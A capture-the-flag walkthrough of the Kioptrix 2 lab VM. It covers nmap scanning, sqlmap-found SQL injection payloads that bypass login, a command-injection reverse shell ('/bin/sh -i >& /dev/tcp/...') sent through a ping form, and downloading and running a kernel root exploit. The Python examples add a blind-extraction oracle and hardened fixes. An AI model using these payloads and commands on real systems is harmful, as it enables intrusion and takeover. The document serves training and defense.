Kioptrix 2 penetration testing walkthrough

Contents

Information gathering

1. Host discovery

2. Port scan

3. Service scan

Web exploitation:

4. SQL injection

5. Remote command execution (bypass)

6. Privilege escalation

Information gathering

1. Host discovery

nmap -sn 192.168.229.1/24

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 20:58 EST
Nmap scan report for 192.168.229.69  // target VM found
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Nmap scan report for 192.168.229.73
Host is up.
MAC Address: 1A:A0:01:1C:61:2B (Unknown)
Nmap scan report for 192.168.229.85
Host is up (0.21s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.136
Host is up (0.12s latency).
MAC Address: 58:1C:F8:E0:85:B7 (Intel Corporate)
Nmap scan report for 192.168.229.247
Host is up (0.00026s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.69 seconds

2. Port scan (all 65535 TCP ports, host discovery skipped with -Pn since we already know it is up)

nmap -sT -p- -Pn 192.168.229.69

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:12 EST
Nmap scan report for 192.168.229.69
Host is up (0.0038s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
655/tcp  open  tinc
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 3.92 seconds

3. Service scan (version detection, default NSE scripts and OS fingerprinting against the open ports found above)

nmap -sT -sV -sC --version-all -O -p 22,80,111,443,631,655,3306 192.168.229.69

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:15 EST
Nmap scan report for 192.168.229.69
Host is up (0.00046s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            652/udp   status
|_  100024  1            655/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2023-12-07T00:06:16+00:00; -2h09m29s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
655/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m29s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds
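The scan above already contains the findings that matter for the rest of the walkthrough (SSHv1 on 22, SSLv2 and an expired certificate on 443, HTTP PUT on CUPS, an end-of-life Apache 2.0.x). As an added example, not part of the original write-up, the following Python script parses that `-sV -sC` text and turns those NSE lines into a findings list; the `SAMPLE_SCAN` string is a constructed excerpt copied from the output above, and the triage rules are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: an excerpt of the nmap -sV -sC output shown above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
|   SSLv2 supported
| ssl-cert: Subject: commonName=localhost.localdomain
|_Not valid after:  2010-10-08T00:10:47
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
655/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Host script results:
|_clock-skew: -2h09m29s
"""

# One "PORT STATE SERVICE VERSION" row of nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    notes: list[str] = field(default_factory=list)  # NSE script lines for this port


def parse_nmap(text: str) -> list[Service]:
    """Parse port rows and attach the NSE script lines that follow each row."""
    services: list[Service] = []
    for line in text.splitlines():
        if line.startswith("Host script results"):
            break  # host-level script output follows; it belongs to no port
        m = PORT_RE.match(line)
        if m:
            services.append(Service(int(m[1]), m[2], m[3], m[4], m[5].strip()))
        elif services and line.startswith("|"):
            # Strip nmap's "| " / "|_ " tree prefix and keep the script text.
            services[-1].notes.append(line.lstrip("|_ ").rstrip())
    return services


def triage(services: list[Service], scan_year: int) -> list[tuple[int, str]]:
    """Turn NSE observations into (port, issue) findings. Rules are illustrative."""
    findings: list[tuple[int, str]] = []
    for s in services:
        notes = "\n".join(s.notes)
        if "Server supports SSHv1" in notes:
            findings.append((s.port, "SSHv1 enabled"))
        if "SSLv2 supported" in notes:
            findings.append((s.port, "SSLv2 enabled"))
        if "Potentially risky methods: PUT" in notes:
            findings.append((s.port, "HTTP PUT allowed"))
        if s.version.startswith("Apache httpd 2.0."):
            findings.append((s.port, "end-of-life Apache 2.0.x"))
        m = re.search(r"Not valid after:\s+(\d{4})", notes)
        if m and int(m[1]) < scan_year:
            findings.append((s.port, f"TLS certificate expired in {m[1]}"))
    return findings


if __name__ == "__main__":
    for port, issue in triage(parse_nmap(SAMPLE_SCAN), scan_year=2023):
        print(f"{port}/tcp: {issue}")
```

For a real engagement, feed it `nmap -oN` output; the grepable (`-oG`) or XML (`-oX`) formats are easier to parse, but this form works on the transcript you already have in a write-up.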

Web exploitation:

Browsing to the target shows a login page:

http://192.168.229.69

4. SQL injection

First confirm with Burp Suite that the login form sends its parameters via POST, then save the captured request and hand it to sqlmap, which does the rest.

Write the captured request to 1.txt and point sqlmap at that file with -r:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# sqlmap -r '1.txt' --level 5 --risk 3
        ___
       __H__                                                                          
 ___ ___[']_____ ___ ___  {1.7.8#stable}                                              
|_ -| . [(]     | .'| . |                                                             
|___|_  [']_|_|_|__,|  _|                                                             
      |_|V...       |_|   https://sqlmap.org                                          

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:10:51 /2023-12-06/

[22:10:51] [INFO] parsing HTTP request from '1.txt'
[22:10:51] [INFO] testing connection to the target URL
[22:10:51] [INFO] testing if the target URL content is stable
[22:10:52] [INFO] target URL content is stable
[22:10:52] [INFO] testing if POST parameter 'uname' is dynamic
[22:10:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[22:10:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:10:52] [INFO] testing for SQL injection on POST parameter 'uname'
-------------
Parameter: psw (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin&psw=-3635' OR 6390=6390-- ZtJm&btnLogin=Login

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: uname=admin&psw=rooot' AND 4175=BENCHMARK(5000000,MD5(0x4c677766))-- LVAp&btnLogin=Login

Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=-3300' OR 1388=1388-- yOfD&psw=rooot&btnLogin=Login

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: uname=admin' AND 3078=BENCHMARK(5000000,MD5(0x6c69784a))-- YDPQ&psw=rooot&btnLogin=Login
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: uname, type: Single quoted string (default)
[1] place: POST, parameter: psw, type: Single quoted string
[q] Quit
> 

sqlmap reports both POST parameters, uname and psw, as injectable and lists four payloads (a boolean-based OR payload and a time-based BENCHMARK payload for each). Either boolean-based OR payload bypasses authentication: paste it into the corresponding form field, submit, and the login succeeds, landing on a page that exposes a ping function. The time-based payloads are for blind data extraction, not for logging in, since a BENCHMARK() comparison evaluates false.
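To make the mechanics behind those payloads concrete, here is an added example (not code from the original write-up or from the Kioptrix VM) in Python: a constructed in-memory SQLite table stands in for the MySQL users table (an assumption; the injection works the same way in both, and the `-- ` comment with a trailing space is what MySQL requires, which is why sqlmap appends `-- yOfD`). It shows the vulnerable string-concatenated query being bypassed by sqlmap's own OR payloads, the parameterized query rejecting them, and the boolean-blind oracle sqlmap uses to pull a password out one character at a time. The credentials in the table are made up.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the login backend: plaintext credentials, made up for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cr3t-example"), ("john", "letmein-example")],
    )
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, uname: str, psw: str):
    # String concatenation, the pattern behind sqlmap's "Single quoted string" finding:
    # a quote in either field closes the literal and the remainder is parsed as SQL.
    sql = f"SELECT username FROM users WHERE username='{uname}' AND password='{psw}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con: sqlite3.Connection, uname: str, psw: str):
    # Bound parameters: values travel separately from the statement, so quotes and
    # comment markers in the input are never seen by the SQL parser as syntax.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (uname, psw)).fetchone()
    return row[0] if row else None


def blind_true(con: sqlite3.Connection, condition: str) -> bool:
    # One boolean-blind probe, the way sqlmap works: the login succeeds only if
    # `condition` holds for the admin row; "-- " comments out the password check.
    return login_vulnerable(con, f"admin' AND ({condition})-- ", "x") is not None


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_"


def extract_password(con: sqlite3.Connection, max_len: int = 64) -> str:
    """Recover admin's password from the true/false oracle, one character per position."""
    recovered = ""
    while len(recovered) < max_len:
        for ch in ALPHABET:
            if blind_true(con, f"substr(password,{len(recovered) + 1},1)='{ch}'"):
                recovered += ch
                break
        else:
            break  # nothing matched: end of string (or a character outside ALPHABET)
    return recovered


if __name__ == "__main__":
    con = make_db()
    # sqlmap's OR payloads from the scan above, in the uname and psw fields respectively
    print(login_vulnerable(con, "-3300' OR 1388=1388-- yOfD", "rooot"))       # admin
    print(login_vulnerable(con, "admin", "-3635' OR 6390=6390-- ZtJm"))       # admin
    print(login_parameterized(con, "-3300' OR 1388=1388-- yOfD", "rooot"))   # None
    print(extract_password(con))                                             # s3cr3t-example
```

The second payload works because `AND` binds tighter than `OR`: `username='admin' AND password='-3635' OR 6390=6390` is true for every row, and the application takes the first one. Against the real target the same `blind_true` probe would go over HTTP with the time-based `BENCHMARK` variant as a fallback when the page content does not differ.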

5. Remote command execution (bypass)

The ping page passes the submitted address straight to a shell, so a command chained after the IP with && executes as well.

Next, get a reverse shell. Start the listener on Kali:

kali: nc -lvvp 4444

Submit this in the ping form (192.168.229.234 is the Kali box; it is the host-discovery entry without a MAC address, which is how nmap lists the scanning host itself):

web: 127.0.0.1 && /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1

The /dev/tcp redirection is a bash feature, not POSIX sh; it works here because /bin/sh on CentOS is bash (the sh-3.00 prompt in the transcript below confirms it).
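As an added example (not the VM's own code, whose source the write-up does not show), this Python snippet reconstructs the command-injection pattern behind such a ping page and puts the fix beside it: the vulnerable version splices the input into a single shell command line, the hardened version allow-lists the input as an IP literal and passes it as its own argv element without a shell. The `ping="echo ping"` stand-in is used so the demonstration runs offline; everything else is the real mechanism.

```python
import ipaddress
import subprocess


def vulnerable_ping_command(target: str, ping: str = "ping -c 3") -> str:
    # Hypothetical reconstruction of the ping page: the submitted value is spliced
    # into one command line that /bin/sh parses, so &&, ;, | and $(...) in the
    # input become shell syntax instead of data.
    return f"{ping} {target}"


def run_via_shell(cmd: str) -> str:
    # shell=True hands the string to /bin/sh -c, which is what PHP's system() does.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_ping_argv(target: str) -> list[str]:
    # Allow-list: anything that is not a bare IPv4/IPv6 literal raises ValueError.
    addr = ipaddress.ip_address(target.strip())
    # Separate argv elements: no shell is involved, so metacharacters are inert.
    return ["ping", "-c", "3", str(addr)]


def accepts(target: str) -> bool:
    """True if the hardened validator would let this input reach ping."""
    try:
        hardened_ping_argv(target)
        return True
    except ValueError:
        return False


def run_hardened(target: str) -> subprocess.CompletedProcess:
    # shell=False (the default) with a list: the kernel execs ping directly.
    return subprocess.run(hardened_ping_argv(target), capture_output=True, text=True)


# The exact string submitted in the walkthrough above.
REVERSE_SHELL = "127.0.0.1 && /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1"

if __name__ == "__main__":
    # "echo ping" stands in for the ping binary so this runs without network access.
    print(run_via_shell(vulnerable_ping_command("127.0.0.1 && echo INJECTED", ping="echo ping")))
    print(vulnerable_ping_command(REVERSE_SHELL))  # the line /bin/sh would have run on the target
    print(accepts("127.0.0.1"), accepts(REVERSE_SHELL), accepts("127.0.0.1; id"))
```

Quoting the input with `shlex.quote()` before concatenation would also neutralise the payload, but it still leaves a shell in the path; validating the value and exec'ing an argv list removes the shell entirely, which is the fix to prefer.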

6. Privilege escalation

We go for a kernel exploit: search with searchsploit, copy the exploit source out of the database, serve it over HTTP from Kali, then download, compile and run it on the target. Before running any kernel exploit, snapshot the VM (a failed attempt can panic the kernel) and check that uname -r on the target falls inside the kernel range the exploit's header claims to cover; nmap fingerprinted this box as Linux 2.6.9 - 2.6.30 on CentOS, which is what 9479.c (CVE-2009-2692, sock_sendpage) targets.

searchsploit linux 2.6 centos

searchsploit -m 9479.c

python3 -m http.server 8080

                                                                                      
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit linux 2.6 centos
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                     |  Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege  | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation  | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation ( | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)                                              | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation             | linux_x86-64/local/45516.c
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit -m 9479.c       
  Exploit: Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
      URL: https://www.exploit-db.com/exploits/9479
     Path: /usr/share/exploitdb/exploits/linux/local/9479.c
    Codes: CVE-2009-2692, OSVDB-56992
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/9479.c


                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080  
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

On the target, fetch the source, compile it and run it:

wget http://192.168.229.234:8080/9479.c

gcc -o 1 9479.c

sh-3.00# wget http://192.168.229.234:8080/9479.c
--20:54:16--  http://192.168.229.234:8080/9479.c
           => `9479.c'
Connecting to 192.168.229.234:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,378 (3.3K) [text/x-csrc]

    0K ...                                                   100%  247.81 MB/s

20:54:16 (247.81 MB/s) - `9479.c' saved [3378/3378]

sh-3.00# ls
9479.c
sh-3.00# gcc -o 1 9479.c
9479.c:130:28: warning: no newline at end of file
sh-3.00# ls
1
9479.c
sh-3.00# ./1
[-] check ur uid
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00

The id output confirms uid=0. The retained groups=48(apache) shows that the exploit elevated the existing Apache-spawned shell process rather than starting a new login session; the # in the prompt before wget was even run indicates this transcript was captured after an earlier successful run, which is also why the second ./1 only prints its "check ur uid" message.